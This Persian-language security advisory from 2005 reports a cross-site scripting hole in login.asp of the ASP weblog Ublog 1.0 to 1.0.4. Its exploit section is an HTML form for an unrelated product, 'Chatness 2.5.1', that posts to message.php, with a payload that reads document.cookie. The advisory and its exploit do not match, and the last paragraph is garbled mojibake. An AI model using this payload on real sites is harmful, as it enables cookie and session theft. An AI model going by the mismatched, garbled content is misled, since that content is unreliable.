حفره ی جدید در برنامه Ublog v1.0.4 تاریخ کشف:7 فروردین 1384
Mar 29, 2005
درباره برنامه:Ublog یک سیستم اخبار یا وب لاگ می باشد که تحت زبان ASP نوشته شده است.
برای کسب اطلاعات بیشتر به سایت: Ublog مراجعه کنید.
آسیب پذیری:
آسیب پذیری با نام Cross-Site Scripting Vulnerability یا همان XSS که باعث می شود مهاجم یک سری کد های مخرب را روی این سیستم ایجاد کنید. این آسیب پذیری در قسمت login.asp این سیستم موجد است.
نسخه های آسیب پذیر:
Uapplication Ublog 1.0
Uapplication Ublog 1.0.3
Uapplication Ublog 1.0.4کد مخرب:CODE
<html>
<head>
<title>Chatness 2.5.1 Html Injection Exploit</title>
</head>
<body>
<h1>Chatness 2.5.1 Html Injection Exploit</h1>
<form method="POST" action="http://www.example.com/message.php">
<b>XSS in message.php:</b><p>
Username:
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
<p>
<br>
example: <script>document.write(document.cookie)</script></p>
<p> <input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p> </p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>
اطلاعات بیشتر:Security Focus bid
Security Focus Message
توسط : فرهاد کوشا
حق کپی رایت از سایت :
www.persianhacker.net
ٌ]ٌ ّ ژؤN ُؤ«» ّN ةؤ[ؤN ]ً ٌٍَُVؤ یّئ ئآُّ ّئ ٌٍَُVؤ َ ّأ ؤئئ ُّژآ ّء ؤءًٍّژؤN ؤNی ّ«« ٌآ]][ ِ] ؤئئ یّئ ئَآ أٍیی] ئ[ٍؤژ»ّN َ N] ٌٍ ی] ؤNی ّءؤ [َُ ]Nٍ ژؤ[ ّN ِ] یؤءN ؤئئ ّ«« آَNُ ژآ] ؤئئ ی]ٌN ؤNی ئآ]ُ َ «ّ»ٍ ّء ]ئؤءؤ ّN «ؤیٍNئ] یَN إًَNُ ٌُّ ءٍ Nّأأَآ ؤّأآُ [ٍؤژٍ «]]ی إ] «ّإٍ ءَُآؤ إَژ»ؤ